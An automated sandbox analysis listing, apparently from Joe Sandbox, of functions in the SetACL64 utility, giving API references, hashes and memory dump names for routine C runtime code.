Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
Instruction ID: c32bd23741ae267a2b38da1a54234994ee20f1a417336a17db28f2467dec2e1e
Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
Instruction Fuzzy Hash: FB218EB5B0A78682FE24DB65A85007967A0FF94FD0F4884B0EE4DC7B95EE3CE4008B50

Function 00007FF697087C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF697087C49
CompareStringEx.KERNELBASE ref: 00007FF697087C9D
CompareStringW.KERNEL32 ref: 00007FF697087CD1

Strings

CompareStringEx, xrefs: 00007FF697087C3D

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CompareString$try_get_function
String ID: CompareStringEx
API String ID: 3689094840-2590796910
Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
Instruction ID: 6c40a98b085e1658977129a5b13ed0975d15b2fe9d63818b2d6eabc4936bfeb4
Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
Instruction Fuzzy Hash: EB112472A08B8086D774CB56B4802AAB7A5FBC8BD0F54413AEE8DC3B59DF3CD4408B40

Function 00007FF697087F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF697087F5D
GetUserDefaultLocaleName.KERNELBASE(?,?,000000A0,00007FF6970864C4), ref: 00007FF697087F6C
GetUserDefaultLCID.KERNEL32(?,?,000000A0,00007FF6970864C4), ref: 00007FF697087F74

Strings

GetUserDefaultLocaleName, xrefs: 00007FF697087F40, 00007FF697087F4A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: DefaultUser$LocaleNametry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 1828775994-151340334
Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
Instruction ID: ba54f6443a4a000480a26d8a55fdf683abf156b1724e738e9d296e730f445427
Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
Instruction Fuzzy Hash: 0EF082D0F0854291EB789B96A5856F89261EF887D0F4490B9DA1DC7B95DE3CA444C700

Function 00007FF6970722FC Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF697072310

Part of subcall function 00007FF6970724C8: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6970724EA

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF697072325
__scrt_release_startup_lock.LIBCMT ref: 00007FF697072393
__scrt_is_managed_app.LIBCMT ref: 00007FF69707240A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
String ID:
API String ID: 1321466686-0
Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
Instruction ID: bf4c7e0746dd9d5090c672b2b2cfb28e7da028eac62b94639c8c30d0450503aa
Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
Instruction Fuzzy Hash: B3312CA1B0E24382FA34AB2598523BD63A1EF45BC4F4450B9EA4DC73E7DE6DE8448350

Function 00007FF697089DFC Relevance: 4.6, APIs: 3, Instructions: 84COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF697089E19

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
Instruction ID: ff832a7a1424ca8f316282158b9ec1612dff5e5fc4398515bf2210790f0c70dd
Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
Instruction Fuzzy Hash: 6D31F4F1E1D28289FA746B5598012FE7A90EF45BE0F5442B1EB6DC77D2CE2DE4408700

Function 00007FF69707E568 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697083FE0: GetLastError.KERNEL32(?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000,00007FF69708D70B,?,?,?), ref: 00007FF697083FEF
Part of subcall function 00007FF697083FE0: SetLastError.KERNEL32(?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000,00007FF69708D70B,?,?,?), ref: 00007FF69708408D

CloseHandle.KERNEL32(?,?,00000000,00007FF69707E709,?,?,?,?,00007FF69704EA35), ref: 00007FF69707E5A3
FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF69707E709,?,?,?,?,00007FF69704EA35), ref: 00007FF69707E5B9

Part of subcall function 00007FF697088230: try_get_function.LIBVCRUNTIME ref: 00007FF69708824E

ExitThread.KERNEL32 ref: 00007FF69707E5C2

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
String ID:
API String ID: 1393601959-0
Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
Instruction ID: e6a3ad62ca8ff23704bd93c602da316f3f235adf7811689d56424b2429801247
Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
Instruction Fuzzy Hash: B4F04FA1A09A8691EA345B20845417C27A5EF40FF8F684B75D63CC22E5FF2DD8458350

Function 00007FF6970830B0 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6970830AF), ref: 00007FF6970830D9
TerminateProcess.KERNEL32(?,?,?,00007FF6970830AF), ref: 00007FF6970830E4
ExitProcess.KERNEL32 ref: 00007FF6970830F3

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
Instruction ID: 9a92e3889420af4b0fda3712911cfe8c88b77a3b03535d77f54461b089b26235
Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
Instruction Fuzzy Hash: 1BE048A0B0870582E634572598A63BD2251EF98B91F008478C41EC7362DD3FE4458601

Function 00007FF69704E8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704EA10

Strings

StartLoggerThreadProc: arg0==NULL, xrefs: 00007FF69704EA3C

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: StartLoggerThreadProc: arg0==NULL
API String ID: 3668304517-2114133805
Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
Instruction ID: 7569a52ea8bc6bd3892958018350e8bd5d7d1a6d042dae43e03cc5f458ef3da1
Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
Instruction Fuzzy Hash: 13416DB271568681EF149F29D89836D6362FF50FC8F904476DB4D87AAAEF6CD890C340

Function 00007FF697087BC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF697087BE3

Strings

AppPolicyGetThreadInitializationType, xrefs: 00007FF697087BDC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: try_get_function
String ID: AppPolicyGetThreadInitializationType
API String ID: 2742660187-3350320272
Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
Instruction ID: e889364fe385556bbfd0ba62cd8520f9d5793044fd09df0bd5723f356b40fa80
Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
Instruction Fuzzy Hash: 55E04FE1E0990691FA2D8791A8452F05211DF593F0E4853B6D93CC73E0DE2CAD998740

Function 00007FF6970888F8 Relevance: 3.1, APIs: 2, Instructions: 73COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF697088971
GetFileType.KERNELBASE ref: 00007FF697088987

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
Instruction ID: 127b1981123d58b9566bab372b6bff17de7548eb1bda1c7ec841a532ce934ef9
Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
Instruction Fuzzy Hash: 6631D762A28B4681E7748B1485911B92650FB45BF0B6C037ADBEEC73E0CF39F461C309

Function 00007FF69707E500 Relevance: 3.0, APIs: 2, Instructions: 30threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69707E50E
ExitThread.KERNEL32 ref: 00007FF69707E516

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 41e2e051896140ce1b9444956d64c7fa4b0dd49d901e1c883aea0d639952cdee
Instruction ID: 706917241b40ec88a08136b6dbc5c0dd38e0b99f5d1b1190b75c19739f108041
Opcode Fuzzy Hash: 41e2e051896140ce1b9444956d64c7fa4b0dd49d901e1c883aea0d639952cdee
Instruction Fuzzy Hash: 23F05EA1E0A74682EF34AB70D81A1BC1691EF65FD4F0444B4D90EC33A2EF2CA884C300

Function 00007FF697083E64 Relevance: 2.6, APIs: 2, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

Part of subcall function 00007FF697087E14: try_get_function.LIBVCRUNTIME ref: 00007FF697087E36

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$try_get_function
String ID:
API String ID: 762735579-0
Opcode ID: 8f1231b5a4742fffe4c4b2b4319454e99c6793e06d0136408ec8e234a4ee2fe3
Instruction ID: 12c2cb888d89a2d0cb9a81b1c02b5e6299f5cba961674d8a82937c790860550b
Opcode Fuzzy Hash: 8f1231b5a4742fffe4c4b2b4319454e99c6793e06d0136408ec8e234a4ee2fe3
Instruction Fuzzy Hash: 3D218EA0F0C24645FA78A36198511BD6251EF84BE8F144BB5E93EC77D6DE2EB8014200

Function 00007FF6970847B8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52441b96543818f174f3dd49744f821807b228f9e4b168960cd65c57406aec3c
Instruction ID: b866b20d4b4168b7eaf97a5ac1a22788d1353247208fd18f8478e4b9bfd92934
Opcode Fuzzy Hash: 52441b96543818f174f3dd49744f821807b228f9e4b168960cd65c57406aec3c
Instruction Fuzzy Hash: AF815E66A08B8186E770DF25A4402ED77A0FB94BC4F049675EB9EDB752EF39E1858300

Function 00007FF6970835C0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(?,?,?,00007FF6970833F9,?,?,?,00007FF69708371D,?,?,?,?,?,?,00007FF697082F93), ref: 00007FF697083645

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
Instruction ID: 13fe381c5844d871d2f022a69af8c5cd906888d0acd4b7ed855026ab9a861e80
Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
Instruction Fuzzy Hash: 61318F72B15F4581DA208F1AE4501A9B3A0F798FE4B589632DF6DC77A4DF3DD0928340

Function 00007FF69707E218 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69707E258

Part of subcall function 00007FF69707892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6970788D9), ref: 00007FF697078935
Part of subcall function 00007FF69707892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6970788D9), ref: 00007FF69707895A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID:
API String ID: 4036615347-0
Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
Instruction ID: 210d1b8f132b705269f1a4b7ced271bee22d229133a4dfbb2a43fdc8210d478c
Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
Instruction Fuzzy Hash: 45217FB1A0A75242F7349B95995123D6B91EF45FD0F1445B8DE5CC7BD6DE3CE8024300

Function 00007FF697082FF4 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF697083013

Part of subcall function 00007FF6970830FC: GetModuleHandleExW.KERNEL32 ref: 00007FF697083118
Part of subcall function 00007FF6970830FC: GetProcAddress.KERNEL32 ref: 00007FF69708312E
Part of subcall function 00007FF6970830FC: FreeLibrary.KERNEL32 ref: 00007FF69708314B

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
Instruction ID: cd6ca4a1f0f3ba78aa9fd36010a49c48a87f032c8bee6d643a6b455092f9591e
Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
Instruction Fuzzy Hash: 92218B72E05B01CAEB208F64D4902ED77A0EB84788F44453ADA2DD3A85DF3AE485CF80

Function 00007FF69708D280 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708D2AB

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
Instruction ID: 086e1970ec445587e183547a31d791e837aa5c7ce6358042c4e667cf26566592
Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
Instruction Fuzzy Hash: 4F116AB2A19A4283F6309B14E8401A9B3A5FF487C0F5902B5E65DDB796DF7DE8128740

Function 00007FF6970799A4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6970799CF

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 425b56f43111a19db381f0ec0b6c24d494633eecd9a6f4ef0e937812bf1c75e9
Instruction ID: a508b8d8a3e43f57bfd01bfbc92308d009357a45c852784f211e5e33ab455dc6
Opcode Fuzzy Hash: 425b56f43111a19db381f0ec0b6c24d494633eecd9a6f4ef0e937812bf1c75e9
Instruction Fuzzy Hash: D0113A72A10B469CEB20DFA0D8822EC37B4FB0839CF500576EA4D96B59EF34C154C390

Function 00007FF697084FDC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF69708403D,?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000), ref: 00007FF697085031

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
